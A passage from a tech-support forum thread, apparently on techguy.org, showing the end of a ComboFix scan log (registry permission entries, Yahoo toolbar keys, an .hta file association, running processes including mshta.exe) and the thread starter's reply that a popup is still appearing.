    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
    @SACL=(02 0001)
    "lastact"=dword:00003640
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
    @SACL=(02 0001)
    "srch_ebox"=dword:4785b178
    "srch_hlt"=dword:47854ece
    "clkstrm"=dword:4785b2dc
    "boo"=dword:4785b2dc
    "etpg70_21"=dword:47854ece
    "sst"=dword:47854ecf
    "mess"=dword:4785b2dc
    "mess_off"=dword:4785b2dc
    "yma"=dword:47854eda
    "mus"=dword:47854edb
    "wik"=dword:47854edb
    "vis_srch70"=dword:4785abea
    "cacheldr"=dword:4785b2dc
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
    @SACL=(02 0001)
    "srch"=dword:4785abec
    "vis_srch70"=dword:4785abec
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
    @SACL=(02 0001)
    "LastPoll_200"=dword:00041537
    "resfeed"=dword:00000002
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
    "InstallStarted"=dword:00000000
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
    "DisplayName"="jlGui 3.0"
    "DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
    "NoModify"=dword:00000001
    "NoRepair"=dword:00000001
    "Publisher"="Music Player for the Java(tm) Platform"
    "Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
    "URLInfoAbout"="http://www.javazoom.net"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Full) (Administrators)
    "bgu0fw0tDZx8jtqEjccbDg==
    "=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
    96
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta]
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Owner)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (Administrators)
    @Denied: (Full) (Users)
    @SACL=
    "PerceivedType"="text"
    @="htafile"
    "Content Type"="application/hta"
    .
    [HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
    @="{eec97550-47a9-11cf-b952-00aa0051fe20}"
    .
    [HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    "MSCurrentCountry"=dword:000000b5
    .
    ------------------------ Other Running Processes ------------------------
    .
    c:\program files\Microsoft Security Client\MsMpEng.exe
    c:\windows\system32\Ati2evxx.exe
    c:\windows\system32\Ati2evxx.exe
    c:\windows\system32\agrsmsvc.exe
    c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
    c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
    c:\windows\system32\rundll32.exe
    c:\windows\System32\tcpsvcs.exe
    c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
    c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
    c:\windows\system32\TODDSrv.exe
    c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
    c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
    c:\program files\TeamViewer\Version6\TeamViewer.exe
    c:\program files\Synaptics\SynTP\SynToshiba.exe
    c:\program files\iPod\bin\iPodService.exe
    c:\windows\system32\mshta.exe
    c:\program files\Synaptics\SynTP\SynTPHelper.exe
    c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
    c:\windows\system32\mshta.exe
    .
    **************************************************************************
    .
    Completion time: 2012-05-30 00:16:00 - machine was rebooted
    ComboFix-quarantined-files.txt 2012-05-30 04:15
    ComboFix2.txt 2012-05-29 18:01
    ComboFix3.txt 2012-05-29 02:55
    .
    Pre-Run: 29,436,858,368 bytes free
    Post-Run: 29,280,116,736 bytes free
    .
    - - End Of File - - 443FBEB5CCBB3C0435B8375034C71986
     
  15. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    The popup is still there, not gone yet.
     
Short URL to this thread: https://techguy.org/1054362